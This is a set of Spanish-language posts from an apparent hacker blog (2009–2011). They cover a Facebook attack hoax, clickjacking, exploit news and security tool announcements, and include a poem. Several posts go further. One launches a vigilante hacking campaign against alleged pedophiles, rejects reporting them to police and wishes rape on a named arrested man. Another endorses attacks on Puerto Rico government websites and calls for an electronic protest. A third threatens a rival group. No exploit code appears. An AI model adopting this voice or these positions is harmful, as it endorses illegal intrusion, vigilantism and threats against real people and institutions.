H4x0r Security Blog

Anonymous Desmiente Ataque En facebook. Un Hoax

noreply@blogger.com (Bryant Alston) — Sat, 13 Aug 2011 12:16:13 PDT

algo que a traido un poco de confusion los ultimos dias y a medida que se acerca el 5 de noviembre la pregunta entre los ./Geeks ./Expertos En seguridad ./Hackers ./Usuarios en general.

Anonymous No Atacara a Facebook.

Segun fuentes o Alguna informacion que se filtro en la red y un video asegura que Facebook viola las politicas de privacidad de los usuarios (cosa que es verdad) y que ellos venden su iformacion a agencias privadas sin el consentimiento de sus usuarios (otra cosa real) aqui el supuesto video:

Video

Ok ahora la informacion o la gente (incluyendome) pensaron wow! Anonymous va a hacer un gran ataque a Facebook, y yo con mi mente tan aventurera me dije ok atacaran a facebook como un Ddos? un defacement, una escalda de privilegios, un stack en los softwares que manejan el gigante social.

en mi mente vinieron muchos servidores, que manejan a otros servidores (que operan como terminales) y se conectan a otros servidores que a su vez conectan con otros.

Suena algo gigantezco no? si lo es . y empeze a imaginarme un Ddos en contra de esos servidores que manejan a otros servidores y que se conectan a otros servidores, sin contar los firewalls, pots, y protocolos de seguridad.

y rapido mi mente en solo 10 minutos estaba botando ya humo, empeze a pensar ok si anonymous es anonimo por que esta info esta tan filtrada en la red y de donde viene este video, si el grupo anonymous no es un simple grupo de "hackers" si no somos todos.

Curiosamente el video original fue borrado de youtube asi como el usuario que lo subio, y pues me di la tarea de buscar por que me parece una Operacion muy grande a llevarse a cabo y fue suficiente para saber que rapidamente como aparecio la info rapido la desmintieron.

AnonymouSabu dijo en su cuenta de facebook:

anonymouSabu The Real Sabu

Thank you to my brothers at @anonops and @anonyOpsIndo for exposing the fact that #opFacebook is bullshit and does not exist.

10 Aug

o sea desmentido el ataque y como posteo en su cuenta de twitter AnonOps

TO PRESS: MEDIAS OF THE WORLD... STOP LYING! #OpFacebook is just ANOTHER FAKE! WE DONT "KILL" THE MESSENGER. THAT'S NOT OUR STYLE #Anonymous

9 Aug via web

y

Dont be silly. Important things are happening in the world to deal with quirks like #OpFacebook. Lets keep our style & moral #Anonymous

ok entonces quien es este grupo que aseguran que "Atacaran" a facebook el 5 de noviembre? un grupo que no necesariamente sea de Anonymous oficial pero pues son Anonimos, la noticia o Hoax a llegado ser tan desconcertante que en el site de Geohot un site que ofrecen jailbreaks y cosas pusieron la manera de "supuestamente" protegerte del "supuesto" ataque ;

Como Protegerte del Ataque del 5 de Noviembre clickea aqui.

jajajaja tipico

ok continuemos esta es la supuesta pagina de los que originaron toda esta Vendeta

Sitio Oficial de OperacionFacebook Click

Cuenta de Twitter .

y Un chat para que se comuniquen los usuarios jajaja Click aqui .

un post de ellos y pueden ver las fechas jajaja miren;

Anonymous: #Op Face.Book
Time is coming, who is ready to do this?

25 de mayo a las 8:40 · ·

lol bueno gente tal ataque no ocurrira solo es un simple hoax de alguien que quiere atencion, aunque siempre es bueno mantener sus cuentas protegidas con la mayor privacidad posible etc. pero no ocurrira tal ataque solo imaginen la estructura de facebook ser atacada.

estamos hablando de 50,000 servidores Linux, centro de datos (Data centers) como cuartos de refrigeracion cada uno con su protocolo interno de seguridad individual, tanto fisico, como remoto, potentes prosesadores AMD por cierto. o sea hablamos tambien de mas de 2,000 servidores Mysql, y servidores de mejoras de memoria o sea la infraestructura de los servidores es una res super compleja.

se me hace dificil pensar que bajarian "FACEBOOK" con Ddos en fin esperemos que esta guerra sea un hoax.

Las luchas de Anon son contra las empresas que abusan de su poder aunque facebook lo hace, y el gobierno.

Buenas Tardes jajajajajajaja

_Bryant

Hacker Boricua Retomando acciones en contra de la pedofilia a nivel Isla

noreply@blogger.com (Bryant Alston) — Mon, 13 Jun 2011 17:25:28 PDT

Bueno hace tiempo el hacktivismo se habia caido aqui en Puerto Rico la verdad que no muchos tomaban las actividades ya que tenemos vidas sociales (reales).

Ok todo este tiempo que estubimos offline veia al menos mensualmente noticias de como los pedofilos viajan hacia la isla, y algunas actividades inusuales.

Jay Fonseca Publico en su sitio web una reaccion hacia el arresto de Alexis D. Negron Cruz su web master del sitio web www.jayfonseca.com alegadamente arrestado por cargos de pedofilia y estupideces de idiotas que no tienen cabezas.

es evidente que una vez el F.B.I arresta a alguien es por que ya habia una investigacion o sea en otras palabras y en resumen el tipo es un puerco, cerdo que no merece vivir.

Pero aqui en h4xxor security no nos importa el F.B.I ni tampoco menos quien es Jay Fonseca y Mucho menos Alexis D.Negron Cruz (Pedofilo Que deberia ser Violado 2,000 VECES) xD, pues decidimos abrir nuevamente nuestro Movimiento en contra de la pedofilia.

esta vez sera un poco diferente antes habiamos habilitado un correo para que nos reportaran sitios webs etc de las actividades de estos cerdos humano pero esta vez el correo se habilitara para solamente reportar emails de estos individuos nosotros nos encargaremos de que hacer con ellos.

este blog no se solidariza con la divulgacion de informacion a las autoridades ya que es falta de etica y obviamente por que las autoridades no hacen nada asiq ue es mejor que nosotros mismos nos encarguemos de atacar a estos sitios.

hunting.pedos@hotmail.com en este email podran enviar emails de estas lacras que sepan que son emails de estas lacras o sea investigar casos etc, eso incluye perfiles de facebook (que hay muchos) o twitter.

Estamos trabajando en un sitio web que subiremos y lo estaremos monitoreando para afiliarlo con agencias que se dedican a lo mismo asi como grupo de hackers que se quieran unir a esta causa que aun es dificil acabar con ellos pero unidos se puede...

si otros grupos de hackers o entusiastas a la informatica se quieren unir simplemente dejenmelo saber pueden enviar un email a la cuenta dada o seguir actualizaciones por twitter el sitio web esperamos subirlo para este mismo viernes!!

hunting.pedos@hotmail.com

y un Mensaje a Jay Fonseca sabemos que no tienes culpa de las personas que estan extentas de tu capacidad mental para administrar un sitio web o algo pero una vez una lacra de estas es cachada con las manos en la masa es si o si haci que gordito cabron, no le de beneficio de duda pedazo de pendejo!!! :-]

salu2

El clickjacking en Facebook de Nuevo en moda

noreply@blogger.com (Bryant Alston) — Thu, 02 Jun 2011 14:55:00 PDT

Bueno uff que tanto tiempo sin darme la vuelta por aca es que mi vida real cada vez se ocupa mas de mi vida cibernetica,.

Pues despues de tanto tiempo me doy la vueltita por aca usualmente me la paso en facebook, compartiendo con mis amistades, con mi familia etc lo usual de una persona comun y corriente. pero a la vez como entusiasta de la informatica me he dado de cuenta que se a puesto de moda el clickjacking Una tecnica usada por hackers o como le quieran llamar para hacerce de cuentas de emails, passwords e informacion personal del usuario Victima xD.

Entonces que es el Susodicho Clickjacking?

Vamos a poner la definicion para el usuario normal, y para los mas experimentado es tan sencillo que es el secuestro de clicks -> o_0 secuestro de click? si a veces la pasamos en facebook y vemos estos videitos que dicen por ejemplo " Padre atrapa a su hija teniendo Sexo con 20 " o Miren como asesinan a esta muchacha por tener un amamente en facebook" etc etc etc lo que hace el clickjacking es ocultar un boton sobre otro boton ... o_0

queeeeeee? si detras de este boton que le das con tu click existe un pequeño script que puede instalar aplicaciones no deseadas en tu computadora u/o ordenador como keyloggers ( para robar lo que tecleas ) etc .

y lo que se esta haciendo de mas moda es el modo de clickjacking que redirigen a otra pagina que de alguna manera u otra te pide acceso a tu cuenta de facebook o twitter ( una tecnica un poco lamosa) dado que la idea de hacer clickjacking es que no tengas que pedirle nada a la victima.. que sea automatizado. osea una especie de clickjacking/phishing.

Y entonces como se protegen es tan sencillo como descargar el plugin para firefox (No Script) con este plugin funciona bloqueando los scripts no deseados, o clickeadas o burradas que hagas para que no vayas de conquistador clickeando cada estupidez que ves por facebook aplica para twitter tambien xD..

asi que la proxima vez amigos no anden de locos creyendose todo lo que ven en facebook.. en fin estoy preparando un sandbox ahora mismo para mostrarle unos buenos ejemplos de clickjacking en tiempo real..

Para Descargar Firefox Aqui
Para Descargar el Plugin de Firefox No Script Aqui

despues de tanto tiempo xD

noreply@blogger.com (Bryant Alston) — Mon, 03 Jan 2011 12:57:01 PST

Bueno de muchas cosas me e perdido este tiempo? (no tento) estube una larga temporada inactivo y la verdad es que si entraba por aqui miraba el blog y me daba mucha weba postear algo inventarme algo..

estube mucho tiempo con mi familia disfrutando de mis hijos y mi esposa (la mejor parte ^_^) y realmente pues como muchos cumpliendo con mis deberes sociales/militares/ociosos...

la realidad que pues despues de estructurar mi tiempo un poco para dedicarme a todo pues decidi regresar por aqui.

despues de estar las ultimas 2 semanas leyendo blogs,foros,comunidades, paginas webs a ver que es lo que esta pasando en la escena y ponerme al dia pues saque una conclusion..

Nada realmente cambia, con la unica diferencia que ahora los niños aprenden a usar un script de explo.it y se creen los mega huaxxxx000rsss xD.

y como que hay muchos des aires de grandeza, antes pues al menos tenian un poco de mas conocimientos, al menos antes los que tenian esos aires de megahuax0r xn80_x112 tenian algunos comocimientos.

pero ahora vemos muchos creiditos con scripts pre-fabricados creyendoselas de mierdas (cosa que no se equivocan)

pero saben que son mierdatos.

en fin mi gente por aca estamos hay que poner la escena de nuevo como estaba hace 5 años atras.

espero que todos hayan tenido un excelente año que paso y que este proximo sea mucho mejor los quiere mucho

Bryant

H4x0r Security Censura a Adrian Lamo {Banned}

noreply@blogger.com (Bryant Alston) — Fri, 30 Jul 2010 21:37:17 PDT

Bueno a la hora de criticar sea al gobierno, sea a cualquier ciudadano lo hago objetivamente ya que creo en la libertad de expresion etc etc...

Pero esta vez vengo a presentar mi censura hacia el "Ex-Hacker" Adrian Lamo, Por el lio ultimamente de Wikileaks y la filtracion de Informacion del gobierno Estadounidense y Los Militares en operaciones en Afganistan E Iraq.

Como ya saben y es un hecho yo soy un Patriota que defiendo mi bandera hasta lo ultimo soy un soldado norteamericano Que Creo en Mi Constitucion etc...pero una cosa que no tolero son los abusos.

1ro el gobierno americano (mi gobierno) tiene arrestado a este joven a quien consideran una amenaza para la seguridad nacional por la divulgacion de dichos documentos.

en parte de los videos Bradley Manning Filtro el famoso video en el que se ve como soldados americanos asesinan a dos (2) Periodistas de Reuters por que hubo una supuesta confusion de identificacion (asi se le llama en el campo de batalla) y pensaron que los 2 Periodistas portaban un Rifle A-k47 y Un Lanzagranadas O R.PG por sus siglas en ingles.

Pero esta vez no se trata de esto esta publicacion se trata de Mi Descontento y Mi Censura hacia el "Ex-Hacker" Adrian Lamo quien como ya saben sus intrusiones a microsoft,Yahoo al New York Times y ahora es tipo es un "Periodista" de 3ra lo lanzaron al ojo publico.

Este "Ex-Hacker" ahora es un periodista de 3ra y se autoconsidera un heroe, Por que se considera un heroe? Por que con todo este lio que a explotado con la divulgacion de los videos en Wikileaks el "Ex-Hacker" Adrian Lamo Revelo Su fuente de noticias..

En otras Palabras El "Ex-Hacker" Y "Periodista" Adrian Lamo Choteo como decimos vulgarmente en la calle al heroe de guerra Bradley Manning de que Manning era el que estaba divulgando la informacion y este mismo (Adrian Lamo) LLamo al F.B.I Y las agencias del gobierno para decirle que el soldado era el que hacia esto..

Adrian Lamo, yo soy una persona que siempre e dicho que la etica hacker no existe en estos tiempos pero viniendo de esta persona (Adrian Lamo) Un "Hacker de Sombrero Gris" al menos la etica siempre debe estar presente en tu corazon.

La Primera Regla u Comportamiento de un hacker y que siempre defenderemos es :
"La Informacion Siempre se Debe Compartir Libremente"

En otras palabras si yo se de alguna manera como liberar el codigo fuente del super mega sistema operativo Windows 7 yo la comparto libremente, en este caso este joven mostro al mundo el vil asesinato de 2 reporteros asi como algunos civiles iraquies en manos de mi gobierno americano.

Entonces dejastes que la informacion fuera revelada y luego lo delatas a las autoridades, Cuando una persona en el ejercito o un gobierno es General siempre se le llamara General Asi como el presidente americano no importa si dejo su presidencia siempre seguira siendo presidente.

Usted Adrian Lamo seguira siendo un hacker. pero como Hacker a violado una de las cosas u reglamentos que al menos como entusiastas de la informatica siempre tratamos de proteger y es protegernos entre nosotros mismos nunca exponer a nuestros colegas ni mucho menos sacarte provecho por medio de otro entusiasta informatico.

La comunidad Hacker dia a dia sigue creciendo muchos caen y muchos vienen pero siempre tratamos de mantener intacto nuestro codigo de honor como Didacticos de la informatica.

Lo que a hecho este hombre Adrian Lamo, es insulto para la comunidad Hacker Exponiendo la libertad de este joven soldado (Choteandolo) o entregandolo a las autoridades y yo como entusiasta a la informatica te censuro.

A nuestros lectores si creen que estoy equivocado con mis comentarios pues les pido mis disculpas pero realmente me parece un descaro de este hombre (Adrian Lamo) en delatar a este joven, cuando el fue un Hacker en el pasado y deberia seguir con todas sus eticas y cumplirlas honorablemente.

Adrian Lamo You Has Been Turned Into A Non-Grata "Hacker"

Espero que a los seguidores de este "ex-Hacker" les moleste mi descontento y a los que esten deacuerdos pues son bienvenidos sus comentarios

Nuevo Codigo de ataque de Firefox se Hace Publico

noreply@blogger.com (Bryant Alston) — Fri, 19 Feb 2010 16:28:21 PST

Un experto de seguridad informatica a hecho publico un nuevo codigo de ataque que afecta el nuevo navegador de firefox o mas bien su version mas reciente.

El Exploit permite que se ejecute remotamente codigo malicioso en la maquina afectada, asi informo Evgeny Legerov (Un Tipo Ruso) xD. quien es fundador de la version rusa de intevydis, que para los que siguen este sitio son analistas en seguridad informatica y busqueda de vulnerabilidades, el mismo programo un nuevo modulo para immunity canvas que es un software de pago para los administradores web o de redes.

Fue probado por los mismos en Windows Xp y Windows Vista., estamos hablando la version 3.6 del navegador (Firefox),

este descubrimiento viene despues que los desarrolladores de Mozilla habian sacado la actualizacion debido a 3 vulnerabilidades y una de ellas involucraban otro desbordamiento pero no el mismo, en este.

Mozilla rapidamente (como era de esperarse) rapidamente ripostaron informando que toman las cuestiones de seguridad bn en srio y que exortaban a los analistas (hackers) a trabajar reportando estas fallas de seguridad para brindar un mejor servicio (si claro) jajaja.

Para mas info sobre el exploit clickeen aqui.

GreenSQL – Firewall Software

noreply@blogger.com (Bryant Alston) — Sun, 14 Feb 2010 11:36:30 PST

GreenSQL es un servidor de seguridad de codigo abierto utilizado para proteger las bases de datos de ataques de inyección SQL. GreenSQL funciona como un proxy para comandos SQL y tiene soporte para MySQL y PostgreSQL. La lógica se basa en la evaluación de los comandos SQL usando una matriz de valoración del riesgo, así como el bloqueo de conocidos comandos de DB administrativa (DROP, CREATE, etc.) GreenSQL se distribuye bajo la licencia GPL.

GreenSQL Arquitectura

GreenSQL funciona como un proxy inverso para las conexiones de MySQL. Esto significa, que en lugar de conectar al servidor MySQL, las aplicaciones se conectará al servidor de GreenSQL. GreenSQL analizará las consultas SQL y, a continuación, si están a salvo, se remitirá a la parte final del servidor MySQL.

Nuevos Cambios

En esta versión, GreenSQL proporciona soporte nativo para PostgreSQL (http://www.postgresql.org) bases de datos para la primera vez. De hecho, GreenSQL es el servidor de seguridad de base de datos única (Open Source o cerrado) disponibles para la protección de las bases de datos PostgreSQL muchos actualmente en uso.

GreenSQL 1,2 combina la GreenSQL paquete de consola en el GreenSQL-FW. El GreenSQL-consola ya no será lanzado como un paquete separado. Durante el proceso de instalación, usted podrá elegir si desea o no instalar la consola.

Usted puede descargar GreenSQL v1.2 aquí: Click Aqui.

O Leer Mas Sobre el Software Aqui.

Dandome la vuelta por ahi todavia Bryant is Back!!!!

noreply@blogger.com (Bryant Alston) — Tue, 26 Jan 2010 10:45:59 PST

estoy por ahi y disculpenme mi poca actividad estoy de vuelta ya definitivo jajajaja en fin saludos a mis amigos y mis enemigos....

En La Jungla interesante herramienta para visualizar procesos(Process Hacker v1.7)

noreply@blogger.com (Bryant Alston) — Fri, 18 Dec 2009 13:19:52 PST

Buscando por ahi e encontrado una herramienta interesante se trata de Process Hacker que es una herramienta de codigo abierto para visualizar procesos. y editor de memoria, con muy buenas caracteristicas.

si llegastes a este post y te interesa la herramienta asumo que ya debes tener conocimientos de hacking al menos intermedios para usar la herramienta aunque realmente no nesesitas ser un mega juanker..hahaha.

Trabaja muy similar que el visor de procesos normal de tu sistema operativo lo unico que este sera de manera maligna.

Muy buenas caracteristicas:

Visualiza,Suspende y Resume Procesos
Reinicia Procesos Creando Archivos "Dump" Que Pueden ser editables en un debugger hasta puedes hacer inyecciones DLL'S dandote posibilidades de usar Dll's malignas/ . Puedes visualizar informacion detallada de cada proceso,estadisticas y su funcionamiento
y muchicimas cosas mas...

Requerimientos son los tipicos de WONDOWS XD EDITION O WONDOWS VOSTA cugh cugh quise decir windows...

.NET Framework 2.0
Microsoft Windows XP SP2 or above, 32-bit or 64-bit

Para descargarlo hazlo desde Aqui :

y lea mas Aca.

salu2

[EXPLO.IT] Archivo de exploits

noreply@blogger.com (Bryant Alston) — Mon, 23 Nov 2009 09:15:58 PST

No es tan nuevo que digamos y asi mismo estan en estado de pruebas pero nuestros amigos de Remote Exploit han rescatado el trabajo de str0ke que a ciencia cierta no se sabe que realmente paso con el si de verdad murio o se trato de una broma pesada lo que si es real es que el dominio de milw0rm permanece inerte.

bueno el grupo de Remote Exploit, precisamente los desarrolladores de Ofensive Security, han continuedo con la linea del proyecto que milw0rm habia dejado atras (str0ke) , esta vez con el dominio de explo.it es una pagina un tanto similar a lo que era milw0rm, la diferencia es que ahora los usuarios tendran la ventaja de descarar las aplicaciones vulnerables si estan disponibles.

el caso es que si la aplicacion vulnerable es [ Home FTP Server 'MKD' Command Directory Traversal Vulnerability] Pueden descargar el archivo vulnerable para propositos de testing en el directorio que es marcado con la letra A para descargar o sea se lista las aplicaciones vulnerables y si tiene la letra que indique arriba podran descargar la aplicacion.

esto les da la ventaja a los usuarios de no ser tan puro script kiddies y les alumbra la curiosidad de descargar la aplicacion y probar localmente el por que de las cosas, ventaja? el conocimiento y muchos mas tester en la jungla.

lo mismo que en milw0rm tienen la direccion de envios que es y deben tener este formato (de cabecera):

# Exploit Title: [title]
# Date: [date]
# Author: [author]
# Software Link: [downoad link if available]
# Version: [app version]
# Tested on: [relevant os]
# CVE : [if exists]
# Code : [exploit code]

al menos se ve un buen proyecto y que amplia mas el mundo de la busqueda de vulnerabilidades y de parcheo de ellas.

tambien pueden descargar el archivo de exploits completo accediendo aqui ,

en fin al menos se decidio continuar con este proyecto que de alguna manera es de vital importancia en el mundo de inseguridad/seguridad IT.

www.exploit-db.com
www.explo.it
www.offensive-security.com
www.remote-exploit.org
www.forums.remote-exploit.org

salu2

Nikto Version Nueva [2.1.0] Scanner de Vulnerabilidades

noreply@blogger.com (Bryant Alston) — Thu, 29 Oct 2009 07:29:40 PDT

Bueno para los que buscan nuevas opciones en cuanto a la busqueda de vulnerabilidades y les gusta usarlos en medio de consola, aca les traigo la noticia de al fin xD sale una nueva version de Nikto de la que hace tiempo no sacaban una nueva version.

en esta nueva version hacen unos nuevos cambios como el arreglo de algunos bugs que tenia la vieja por ejemplo, cuando realizabas una auditoria y el scanner se quedaba tratando de conectarse si lo usabas en modo verbose ni te devolvia un "Conection Time Out".

La re-escritura de los plugins que te da la facilidad de modificarlos y agregar nuevos.

el motor de notificaciones tambien modificable asi encontrandole mejores usos.

modificacion del cache del script permitiendo que el mismo no haga mucho ruido en los servidores auditados, y la habilidad de desabilitar las notificaciones 404 del servidor.

Habilidad de adivinar si el sistema remoto esta en un adaptador y es un dispositivo aparte y reportarlo.

Plugin para usar las listas de diccionario de OWASP Para tratar ataques de fuerza bruta en el servidor remoto.

Plugin para tratar ataques de fuerza bruta en el dominio auditado.

Permite adivinar el nombre de usuario con metodos de fuerza bruta.

Soporte para autentificacion NLTM.

Para descargarlo Version 2.1.0 .gz or .bz2 | Plugins & DBs .

Salu2

Mensaje Al Cabron Del Gobernador De Puerto Rico

noreply@blogger.com (Bryant Alston) — Fri, 25 Sep 2009 20:26:35 PDT

Despido Masivo De Miles De Empleados En Puerto Rico :O

Bueno estoy segurisimo que este mensaje Ni lo leera el gobernador de la isla de Puerto Rico de la que Es Mi madre o sea ella es oriunda de la isla pero nosotros siempre nos hacemos escuchar..

los que me conocen saben que soy un Patriota Americano y defiendo mi constitucion hasta la muerte siempre y cuando sea dentro de los terminos de la constitucion que dicta Estados Unidos De America y con orgullo, soy un soldado con mala sangre y defiendo mi postura hasta lo ultimo.mas bien el abuso no lo tolero.

este dia ocurrio una masacre moral en La Isla de Puerto Rico cuando el muy Cabron,Mal Parido e hijo de la gran puta Gobernador de la isla Luis "MilHouse" Fortuño despidio a miles de empleados justificando un deficit de yo no se cuantos Millones (3,ooo).

la verdad que me deja sin palabras ya que en ese pais ellos impusieron un arbitrio para sufragar esa deuda subieron cientos de cosas para sufragar esa deuda y la misma no baja...jajajajaja

valla movida del gobierno que lo unico que realmente persiguen detras de esto es recibir los paquetes de ayuda federal de Estados Unidos que esta otorgando a los paises con estas crisis jajaja y engordar sus bolsillos...

a la hora que estoy escribiendo esto ya muchos websites del gobierno de Puerto Rico estan recibiendo ataques webs de diferentes clases como repercusiones del mismo Gobierno y del abuso que tienen de poder (no muy diferente a diferentes gobiernos) pero en este caso

yo Blood_rec apoyo los ataques que se estan llevando acabo y apoyo todo lo que sea en contra del gobierno arbitrario de Luis Fortuño, y como ya lei en diferentes diarios electronicos del pais y paginas webs Tambien Me Cago En tu Madre Gobernador de mierda. jajajaja

pero como el no va a leer esto le decimos gobernador de Puerto Rico que nosotros los del under nos aseguraremos que usted sepa que estamos con el Pueblo De Puerto Rico y que nos estamos Cagando en su Madre jajajaja...

que la furia del pueblo trabajdor caiga sobre usted yo apoyo todo esto por que llevo parte de la isla en mi sangre y me siento latino me siento parte del pueblo y es un abuso desmedido de parte de ese Gobierno..

el sindicato de trabajadores acabo de anunciar para el 15/octubre/2009 un paro nacional,nosotros convocamos para el 15/octubre/2009 una protesta electronica en contra de Luis Fortuño y toda la bola de pendejos que lo siguen de su partidoo. :D

asi que Gente como mencione arriba los apoyo y agradezco sus mensajes pidiendome que los asistiera recalco que los ataques llevados a cabo no son en apoyo de ningun partido ni mierda cabrones esto es el pueblo que grita "BASTA DE ABUSOS MALDITOS".

Cito esto:
Ya no podemos sequier culpando al pueblo por su inconciencia, Tenemos que enfrentar la realidad...no todos votamos por ese dictador pero tenemos que enfrentar el desastre y combatier la tormenta....

El grito es, un paro nacional!..Esta lucha es una lucha de dia y noche, es la paralizacion del pais por parte del pueblo, es la paralizacion de todas las carretas y puentes ,es hacer uso de la desobediencia civil como intrumento de lucha, es la desobediencia civil necesaria en la casa de las layes y en la fortaleza, para dejarle saber a ese cabr0@ de gobernador y su legisladores que ahora se hacen los no culpables, que este pueblo se RESPETA!...

No hay ley o orden mas grande,no hay ejercito mas poderoso, que la voluntad soberana del pueblo de Puerto Rico y su derecho a la dignidad y el respeto!..NO PODEMOS DOBLEGAR RODILLA AHORA NI MAÑANA NI NUNGA HASTA QUE AQUI NO SE RESTAURE LA DEMOCRACIA Y SE RESPETE EL TRABAJO DE CADA PUERTORRIQUEÑO..
===================================================================
con esas declaraciones de un trabajador Boricua dejadas en un website Puertorriqueño los dejo y esta protesta continuara....

ya es hora que escuchen al pueblo trabajador y de nuevo me les uno por motivos sociales no apoyo y recalco a ningun maldito Partido ==PNP'S,PPD'S,PIP'S.PPP, o como se llame el partido ese amarillo todos esos patidos me la raspan asi que ya saben gente de Puerto Rico estoy con ustedes...

blood_rec

MYSQLOIT to0l de inyecciones sql para LAMP

noreply@blogger.com (Bryant Alston) — Sat, 12 Sep 2009 13:13:06 PDT

Como es usual leyendo en Darknet me encuentro con esta interesante herramienta Mysqloit que es una herramienta para gestion de inyecciones sql orientada a el servidor LAMP (Linux Apache MySqL y PhP) asi como WAMP (Windows Apache MySqL Y Php) tiene la gran ventaja de subir shellcodes de metasploit y ejecutarlos a traves de la inyeccion.

Asi como saben cuando van probando inyecciones los atacantes se enfrentan a muchas limitaciones o restricciones a la hora de ir probando.

Como la falta de consulta o (strings) en el comando sql que van probando y por esa razon Mysql es una plataforma de gestion de base de datos no muy seguro, la ejecucion de codigo remoto.. esta herramienta automatiza todo el proceso incluyendo consultas que podemos pasar por alto.

Las Caracteristicas de la Herramienta son:

Ejecucion de inyeccion Basado en tiempo de la misma

Huellas Digitales De La Base De Datos

Huellas Digitales del servidor web

Creacion De Payloads (tipo metasploit) y ejecucion de los mismos

==============================================

La Herramienta actualmente esta siento testeada en plataforma Linux, asi que no dudaria que la desarrollen tambien para windows,esta en su pleno desarrollo la misma.

os invito que la prueben y como recomiendan en Darknet les dejen sus opiniones al autor de la misma, asi pueden haber varias mejorias.

Descarga De La misma:
MySqloitv0.1.tar

Web Sobre Ella:
Aqui.

salu2

Advertencia A Los Anti Bin Laden records

noreply@blogger.com (Bryant Alston) — Sat, 12 Sep 2009 12:05:56 PDT

Bueno espero no seguir saliendome del contexto de la tematica de mi blog q es uno de Seguridad Informatica y Hacking pero igual es mi blog y escribo lo que me salga de los cojones..

esto lo escribo a raiz que ya me han enviado 3 privados bien tonto un grupito que parece que se reune en la mierda de red social MySpace y tienen una serie de Spaces que los consideran los AntiBinladen records Menuda mierda de nombre...

los privados amenazantes sobre el apoyo y mierdas que hablan y cosas me los paso por los huevos,, este grupito parece que lo que quieren es medirle el pene a nosotros o cosas y como ya saben no me gustan las guerritas informaticas (al final siempre las gano) xD ...

en fin al grupito ANTIBINLADENRECORDS este que de seguro que tienen que ser una bola de chamakitos que no tienen mas nada que hacer y parece que con mis post en apoyo a mi gente y si no lo negare "SOY DE BAYAMON LAMBONCITOS" pues quieren meter cabritas y voy a advertirles algo.

Chamakitos no ronquen nada por aqui en internet por que de una cosa estamos seguro que deben ser del area estupidos y si realmente me conocen deben saber quien soy aparte que tienen que tener cuidado que escriben en su space y su sitio web por que en internet muchos leen y pueden quedar mal.

Yo no jodo en la calle pero si aqui en la red asi que idiotas les recomiendo que modifiquen todas sus baboserias bardas y sus privaditos que me envian dejenlos para su juego de PS3 por que la vida no es Grand Theft Auto.

Mucho cuidado con lo que escriben ANTIBINLADENS por que la red le puede caer en la cabeza no quiero ser un egocentrico pero no me hinchen las bolas por que a ustedes nunca les e dicho nada asi que si quieren seguir con su sitio dejen la mierda esa de antibinladen y estupideces y no me envin privados...

que no quiero romperles el culo, yo no se de donde sacaron esa estupides pero no les quda y mucho menos llaman la atencion, de verdad tengan cuidado NENITOS que ni el internet es tan seguro como piensan, a lo mejor piensan que estar detras de un monitor no se les puede identificar y estan equivocaditos.

asi que diganles a Papi y Mami que los castigue sin internet o algo por que les pueden tocar la puerta nenes y dejen de hincharme las pelotas a mi idiotas jajajaja.....

de verdad que no se que rayos es eso de ANTIBINLADEN RECORDS bobolones comprense un control de ps nuevo y retirense de la red con dignidad

[Escritura y Literatura] Nacimiento

noreply@blogger.com (Bryant Alston) — Wed, 02 Sep 2009 23:23:37 PDT

Si no te gusta la literatura simplemente no leas este post y sigue tu camino por lo menos esto no tiene que ver con informatica ni seguridad esta vez son loqueras y cosas de mi mente

Una de las cosas que muchos no conocen de mi es que me encanta leer por ende me encanta escribir tambien cuando estoy en mi musa solo cojo mi libreta y un papel y no paro de escribir ya se habran dado de cuenta con los manuales xD...

pero me gusta escribir sobre todo sea social,politico,mi vida lo que sea y la inspiracion que tenga en el momento o por solo escibir la verdad es que es uno de mis mejores amigos ( La Libreta)...

Esta Endum..como le llamo le puse Nacimiento por que es una faceta y aficion que nadie del mundo under o en la red conoce de mi:

"Cada vez la esqina se hace mas chica, y el silencio ya esta lastimando mi ser,los temores de la oscuridad se vuelven palpantes con el pasar de los meses. miro a mi alrededor y solo veo oscuridad.

Quiero respirar. Grito en mi mismo espacio pero nadie me escucha estoy despierto pero siento que duermo, y mas aun el sentimiento se engrandeze en mi ser. mi corazon late mas rapido de lo comun, y no se que es todavia la libertad.

Quiero Vivir. La ignorancia de lo desconocido me intriga mi deseo,ya que soy un ser ignorante. ignoro la vida, ignoro el amor, ignoro el odio por que nunca tube a nadie que amar, ignoro el dolor por que nunca quise sufrir, ignoro la vida por que aqui siento morir. mas bien las ganas y el deseo me llevan por este camino de salir.

Quiero Amar. Nunca e creido en lo que no veo, en lo que no toco en lo que no pruebo, pero en cambio esta es una sensacion que fluye en mi adentro, nunca pense que podia tener el potencial de crear algo a base de lo inexplicable, rio sin razon pero estoy conciente de por que lo hago, el silencio se burla de mi por que no puedo expresar lo que siento y solo la oscuridad es lo mas cercano a el sentimiento que quiere salir de mi.

Quiero Soñar. No el sueño que e tenido con el espacio tiempo que vive en mi. si no el sueño de imaginarme en un mundo con colores,olores,sabores, saber que es lo que hace el sonido que escucho alla fuera y el por que empezamos desde la oscuridad y retornamos a ella.

Quiero Danzar. Y no verme en mi espacio limitado de mi propio reencuentro, con mi danza expresar lo que tengo, que la oscuridad lleve mi paso y el silencio sea mi musica, que las rarezas de lo desconocido se tornen en la sabiduria de mi danza.

Quiero Cantar. y que mi voz sea escuchada. y lo que este al mi alrededor cante conmigo,asi que el silencio se convierta en voz y mi voz se convierta en silencio, pero un silencio melodico, y asi comunicarme con el universo, el mismo universo que habita en mi interior.

Quiero Volar. Y salir de aqui y poder desplegar las alas de mi la imaginacion, no tener la restriccion de mi libertad cerrar mis ojos pero poder besar el cielo y alejar de mi todo lo que me a acompañado a lo largo de mi corta vida, asi como el viento vuela por toda la materia que nos rodea.

Quiero Nacer. Conocer El Sonido que solo escuchaba de lejos,quitarme la mascara del miedo, y tomar la flor de lo timido, aprender como amar,soñar,pensar,volar. y que no sean solo un deseo remoto. que la oscuridad tome color y el silencio se pueda palpar.

Acabo de verlo todo,y la sensacion es palpable la vida me a dado la bienvenida, estoy conociendo el amor, estoy conociendo el sufrir,estoy conociendo el pensar, estoy conociendo la libertad. mis letras alejan el dolor. del que nunca habia experimentado.

Posiblemente sea una etapa totalmete diferente,ya no lo veo ya no lo escucho mientras comprendo que todo era pasajero que mi nacimiento es una transcicion, es el primer paso a mi autoconocimiento, ahora comprendo que nacer no es mas que vivir."

[black-moon]

by bloodrec

Stoned Bootkit Malware En El MBR de Windows Que Novedad xD

noreply@blogger.com (Bryant Alston) — Sun, 23 Aug 2009 10:18:31 PDT

